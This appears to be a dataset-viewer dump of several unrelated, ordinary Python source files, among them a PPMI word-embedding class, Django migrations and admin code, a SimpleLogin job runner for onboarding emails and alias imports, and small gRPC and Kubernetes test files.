Base class for explicit representations. Assumes that the serialized input is (P)PMI.
"""
def __init__(self, mat, word_vocab, context_vocab, normalize=True, restricted_context=None):
self.m = mat
self.iw = word_vocab
self.ic = context_vocab
self.wi = {w:i for i,w in enumerate(self.iw)}
self.ci = {c:i for i,c in enumerate(self.ic)}
self.normal = normalize
if restricted_context != None:
self.restrict_context(restricted_context)
if normalize:
self.normalize()
def __getitem__(self, key):
if self.oov(key):
raise KeyError
else:
return self.represent(key)
def __iter__(self):
return self.iw.__iter__()
def __contains__(self, key):
return not self.oov(key)
@classmethod
def load(cls, path, normalize=True, restricted_context=None, **kwargs):
mat = load_matrix(path)
word_vocab, context_vocab = load_vocabulary(mat, path)
return cls(mat, word_vocab, context_vocab, normalize=normalize, restricted_context=restricted_context)
def get_subembed(self, word_list, normalize=False, restrict_context=True):
"""
Gets subembedding.
"""
w_set = set(self.iw)
valid_w = [word for word in word_list if word in w_set]
new_w_indices = np.array([self.wi[word] for word in valid_w])
if restrict_context:
c_set = set(self.ic)
valid_c = [word for word in word_list if word in c_set]
new_c_indices = np.array([self.ci[word] for word in valid_c])
new_m = self.m[new_w_indices, :]
new_m = new_m[:, new_c_indices]
else:
valid_c = self.ic
new_m = self.m[new_w_indices, :]
return Explicit(new_m, valid_w, valid_c, normalize=normalize)
def restrict_context(self, rel_words):
"""
Restricts the context words (i.e, columns) to the provided words.
"""
rel_words = [word for word in rel_words if word in self.ci]
rel_indices = np.array([self.ci[rel_word] for rel_word in rel_words])
self.m = self.m[:, rel_indices]
self.ic = rel_words
self.ci = {c:i for i,c in enumerate(self.ic)}
def normalize(self):
preprocessing.normalize(self.m, copy=False)
def represent(self, w):
if w in self.wi:
return self.m[self.wi[w], :]
else:
return csr_matrix((1, len(self.ic)))
def similarity_first_order(self, w, c):
if self.oov(w) or self.oov(c):
return 0.0
return self.m[self.wi[w], self.ci[c]]
def oov(self, w):
return (not w in self.wi)
def similarity(self, w1, w2):
"""
Assumes the vectors have been normalized.
"""
if self.oov(w1) or self.oov(w2):
return float('nan')
return self.represent(w1).dot(self.represent(w2).T)[0, 0]
def closest_contexts(self, w, n=10):
"""
Assumes the vectors have been normalized.
"""
scores = self.represent(w)
return heapq.nlargest(n, zip(scores.data, [self.ic[i] for i in scores.indices]))
def closest(self, w, n=10):
"""
Assumes the vectors have been normalized.
"""
if self.oov(w):
return []
scores = self.m.dot(self.represent(w).T).T.tocsr()
return heapq.nlargest(n, zip(scores.data, [self.iw[i] for i in scores.indices]))
def closest_first_order(self, w, n=10):
if self.oov(w):
return []
scores = self.m[self.wi[w], :]
return heapq.nlargest(n, zip(scores.data, [self.iw[i] for i in scores.indices]))
class PositiveExplicit(Explicit):
"""
Positive PMI (PPMI) with negative sampling (neg).
Negative samples shift the PMI matrix before truncation.
"""
def __init__(self, mat, word_vocab, context_vocab, normalize=True, restricted_context=None, neg=1):
Explicit.__init__(self, mat, word_vocab, context_vocab, normalize=False, restricted_context=restricted_context)
self.m.data -= np.log(neg)
self.m.data[self.m.data < 0] = 0
self.m.eliminate_zeros()
if normalize:
self.normalize()
@classmethod
def load(cls, path, normalize=True, restricted_context=None, thresh=None, neg=1):
mat = load_matrix(path, thresh)
word_vocab, context_vocab = load_vocabulary(mat, path)
return cls(mat, word_vocab, context_vocab, normalize, restricted_context, neg=neg)
|
py | b414f69d756964cdfde2ddf66d76e932d095ecab | # Generated by Django 2.0.5 on 2019-03-08 20:54
from django.db import migrations, models
class Migration(migrations.Migration):
dependencies = [
('TCS', '0031_auto_20190228_1417'),
]
operations = [
migrations.AddField(
model_name='orderservice',
name='brandName',
field=models.CharField(blank=True, max_length=250),
),
migrations.AddField(
model_name='orderservice',
name='companyName',
field=models.CharField(blank=True, max_length=250),
),
migrations.AddField(
model_name='orderservice',
name='modeloName',
field=models.CharField(blank=True, max_length=250),
),
migrations.AddField(
model_name='orderservice',
name='storeName',
field=models.CharField(blank=True, max_length=250),
),
]
|
py | b414f6b7782643a693a0bbf9cf966c4cf8a51bed | class BaseDataStore(object):
""" Base absctract class for data store
Attributes:
walkers: list of Walkers, that would listener any message received from data store
"""
def __init__(self):
self.walkers = []
def on_message(self, message):
transformed_msg = self.transform(message)
for walker in self.walkers:
walker.recv(transformed_msg)
def register(self, walker):
self.walkers.append(walker)
def unregister(self, walker):
self.walkers.remove(walker)
def transform(self, msg):
return msg
def setup(self):
raise NotImplementedError
class StaticDataStore(BaseDataStore):
"""
Used for static unmodified data that load data at first time
Attributes:
messages: list of any type of message
"""
def __init__(self, messages):
super(StaticDataStore, self).__init__()
self.messages = messages
def setup(self):
for message in self.messages:
self.on_message(message)
class AsyncDataStore(BaseDataStore):
"""
Used for async data
Attributes:
register_func: callable that would accept a callable for on_message callback
"""
def __init__(self, register_func):
super(AsyncDataStore, self).__init__()
self.register_func = register_func
def setup(self):
self.register_func(self.on_message)
|
py | b414f791cb02a7c1fb5573907cccd7980e2160d4 | """
Run scheduled jobs.
Not meant for running job at precise time (+- 1h)
"""
import csv
import time
import arrow
import requests
from app import s3
from app.config import (
JOB_ONBOARDING_1,
JOB_ONBOARDING_2,
JOB_ONBOARDING_4,
JOB_BATCH_IMPORT,
)
from app.email_utils import (
send_email,
render,
get_email_domain_part,
)
from app.utils import sanitize_email
from app.extensions import db
from app.log import LOG
from app.models import (
User,
Job,
BatchImport,
Alias,
DeletedAlias,
DomainDeletedAlias,
CustomDomain,
)
from server import create_app
# fix the database connection leak issue
# use this method instead of create_app
def new_app():
app = create_app()
@app.teardown_appcontext
def shutdown_session(response_or_exc):
# same as shutdown_session() in flask-sqlalchemy but this is not enough
db.session.remove()
# dispose the engine too
db.engine.dispose()
return app
def onboarding_send_from_alias(user):
to_email, unsubscribe_link, via_email = user.get_communication_email()
if not to_email:
return
send_email(
to_email,
"SimpleLogin Tip: Send emails from your alias",
render("com/onboarding/send-from-alias.txt", user=user, to_email=to_email),
render("com/onboarding/send-from-alias.html", user=user, to_email=to_email),
unsubscribe_link,
via_email,
)
def onboarding_pgp(user):
to_email, unsubscribe_link, via_email = user.get_communication_email()
if not to_email:
return
send_email(
to_email,
"SimpleLogin Tip: Secure your emails with PGP",
render("com/onboarding/pgp.txt", user=user, to_email=to_email),
render("com/onboarding/pgp.html", user=user, to_email=to_email),
unsubscribe_link,
via_email,
)
def onboarding_browser_extension(user):
to_email, unsubscribe_link, via_email = user.get_communication_email()
if not to_email:
return
send_email(
to_email,
"SimpleLogin Tip: Chrome/Firefox/Safari extensions and Android/iOS apps",
render("com/onboarding/browser-extension.txt", user=user, to_email=to_email),
render("com/onboarding/browser-extension.html", user=user, to_email=to_email),
unsubscribe_link,
via_email,
)
def onboarding_mailbox(user):
to_email, unsubscribe_link, via_email = user.get_communication_email()
if not to_email:
return
send_email(
to_email,
"SimpleLogin Tip: Multiple mailboxes",
render("com/onboarding/mailbox.txt", user=user, to_email=to_email),
render("com/onboarding/mailbox.html", user=user, to_email=to_email),
unsubscribe_link,
via_email,
)
def handle_batch_import(batch_import: BatchImport):
user = batch_import.user
batch_import.processed = True
db.session.commit()
LOG.debug("Start batch import for %s %s", batch_import, user)
file_url = s3.get_url(batch_import.file.path)
LOG.d("Download file %s from %s", batch_import.file, file_url)
r = requests.get(file_url)
lines = [line.decode() for line in r.iter_lines()]
reader = csv.DictReader(lines)
for row in reader:
try:
full_alias = sanitize_email(row["alias"])
note = row["note"]
except KeyError:
LOG.warning("Cannot parse row %s", row)
continue
alias_domain = get_email_domain_part(full_alias)
custom_domain = CustomDomain.get_by(domain=alias_domain)
if (
not custom_domain
or not custom_domain.verified
or custom_domain.user_id != user.id
):
LOG.debug("domain %s can't be used %s", alias_domain, user)
continue
if (
Alias.get_by(email=full_alias)
or DeletedAlias.get_by(email=full_alias)
or DomainDeletedAlias.get_by(email=full_alias)
):
LOG.d("alias already used %s", full_alias)
continue
alias = Alias.create(
user_id=user.id,
email=full_alias,
note=note,
mailbox_id=user.default_mailbox_id,
custom_domain_id=custom_domain.id,
batch_import_id=batch_import.id,
)
db.session.commit()
LOG.d("Create %s", alias)
if __name__ == "__main__":
while True:
# run a job 1h earlier or later is not a big deal ...
min_dt = arrow.now().shift(hours=-1)
max_dt = arrow.now().shift(hours=1)
app = new_app()
with app.app_context():
for job in Job.query.filter(
Job.taken.is_(False), Job.run_at > min_dt, Job.run_at <= max_dt
).all():
LOG.d("Take job %s", job)
# mark the job as taken, whether it will be executed successfully or not
job.taken = True
db.session.commit()
if job.name == JOB_ONBOARDING_1:
user_id = job.payload.get("user_id")
user = User.get(user_id)
# user might delete their account in the meantime
# or disable the notification
if user and user.notification and user.activated:
LOG.d("send onboarding send-from-alias email to user %s", user)
onboarding_send_from_alias(user)
elif job.name == JOB_ONBOARDING_2:
user_id = job.payload.get("user_id")
user = User.get(user_id)
# user might delete their account in the meantime
# or disable the notification
if user and user.notification and user.activated:
LOG.d("send onboarding mailbox email to user %s", user)
onboarding_mailbox(user)
elif job.name == JOB_ONBOARDING_4:
user_id = job.payload.get("user_id")
user = User.get(user_id)
# user might delete their account in the meantime
# or disable the notification
if user and user.notification and user.activated:
LOG.d("send onboarding pgp email to user %s", user)
onboarding_pgp(user)
elif job.name == JOB_BATCH_IMPORT:
batch_import_id = job.payload.get("batch_import_id")
batch_import = BatchImport.get(batch_import_id)
handle_batch_import(batch_import)
else:
LOG.exception("Unknown job name %s", job.name)
time.sleep(10)
|
py | b414f8d866853c7cc15ed971aab81d13fc9b6d69 | # coding: utf-8
"""
Kubernetes
No description provided (generated by Swagger Codegen https://github.com/swagger-api/swagger-codegen)
OpenAPI spec version: v1.13.5
Generated by: https://github.com/swagger-api/swagger-codegen.git
"""
from __future__ import absolute_import
import os
import sys
import unittest
import kubernetes.client
from kubernetes.client.rest import ApiException
from kubernetes.client.models.v1_local_volume_source import V1LocalVolumeSource
class TestV1LocalVolumeSource(unittest.TestCase):
""" V1LocalVolumeSource unit test stubs """
def setUp(self):
pass
def tearDown(self):
pass
def testV1LocalVolumeSource(self):
"""
Test V1LocalVolumeSource
"""
# FIXME: construct object with mandatory attributes with example values
#model = kubernetes.client.models.v1_local_volume_source.V1LocalVolumeSource()
pass
if __name__ == '__main__':
unittest.main()
|
py | b414f8e6f690771026d4f3b7422bbe089175c1e4 | # Copyright 2016, Google Inc.
# All rights reserved.
#
# Redistribution and use in source and binary forms, with or without
# modification, are permitted provided that the following conditions are
# met:
#
# * Redistributions of source code must retain the above copyright
# notice, this list of conditions and the following disclaimer.
# * Redistributions in binary form must reproduce the above
# copyright notice, this list of conditions and the following disclaimer
# in the documentation and/or other materials provided with the
# distribution.
# * Neither the name of Google Inc. nor the names of its
# contributors may be used to endorse or promote products derived from
# this software without specific prior written permission.
#
# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS
# "AS IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT
# LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR
# A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT
# OWNER OR CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL,
# SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT
# LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE,
# DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY
# THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT
# (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE
# OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
import time
import threading
import unittest
from grpc._cython import cygrpc
# TODO(nathaniel): This should be at least one hundred. Why not one thousand?
_PARALLELISM = 4
def _channel_and_completion_queue():
channel = cygrpc.Channel('localhost:54321', cygrpc.ChannelArgs(()))
completion_queue = cygrpc.CompletionQueue()
return channel, completion_queue
def _connectivity_loop(channel, completion_queue):
for _ in range(100):
connectivity = channel.check_connectivity_state(True)
channel.watch_connectivity_state(
connectivity, cygrpc.Timespec(time.time() + 0.2), completion_queue,
None)
completion_queue.poll(deadline=cygrpc.Timespec(float('+inf')))
def _create_loop_destroy():
channel, completion_queue = _channel_and_completion_queue()
_connectivity_loop(channel, completion_queue)
completion_queue.shutdown()
def _in_parallel(behavior, arguments):
threads = tuple(
threading.Thread(target=behavior, args=arguments)
for _ in range(_PARALLELISM))
for thread in threads:
thread.start()
for thread in threads:
thread.join()
class ChannelTest(unittest.TestCase):
def test_single_channel_lonely_connectivity(self):
channel, completion_queue = _channel_and_completion_queue()
_in_parallel(_connectivity_loop, (channel, completion_queue,))
completion_queue.shutdown()
def test_multiple_channels_lonely_connectivity(self):
_in_parallel(_create_loop_destroy, ())
if __name__ == '__main__':
unittest.main(verbosity=2)
|
py | b414f9b0fca0811134d4aeb98595a415b7f7c71d | from pyrosim.commonFunctions import Save_Whitespace
class MATERIAL:
def __init__(self, name="Cyan", color_rgba=[0, 1, 1, 1]):
self.depth = 3
self.string1 = f'<material name="{name}">'
self.string2 = f' <color rgba="{color_rgba[0]} {color_rgba[1]} {color_rgba[2]} {color_rgba[3]}"/>'
self.string3 = f'</material>'
def Save(self,f):
Save_Whitespace(self.depth,f)
f.write( self.string1 + '\n' )
Save_Whitespace(self.depth,f)
f.write( self.string2 + '\n' )
Save_Whitespace(self.depth,f)
f.write( self.string3 + '\n' )
|
py | b414fa381d241b5c74067a3c5009d9f1012caaa1 | from django.contrib import admin
from main.models import HbBlockData, Reception
class HbBlockDataAdmin(admin.ModelAdmin):
fieldsets = [
('BlockData', {'fields': ['ownerBlockId', 'url', 'publicKey', 'createDate']}),
('BlockDComments', {'fields': ['comments']})
]
class ReceptionAdmin(admin.ModelAdmin):
fieldsets = [
('Reception', {'fields': ['rid', 'mediatorId', 'receptionistId', 'adopterId', 'status', 'url', 'hash',
'createDate', 'confirmDate']}),
('ReceptionComments', {'fields': ['comments', 'opinionDate', 'opinions']})
]
admin.site.register(HbBlockData, HbBlockDataAdmin)
admin.site.register(Reception, ReceptionAdmin)
|
py | b414fa53e584e8a63b62b0d709053f2b2fe46fe6 | MSG = (
"Another World was a fun game. But not as fun as DrgnS{MoarBMPstegano!!!}"
)
|
Subsets and Splits
No saved queries yet
Save your SQL queries to embed, download, and access them later. Queries will appear here once saved.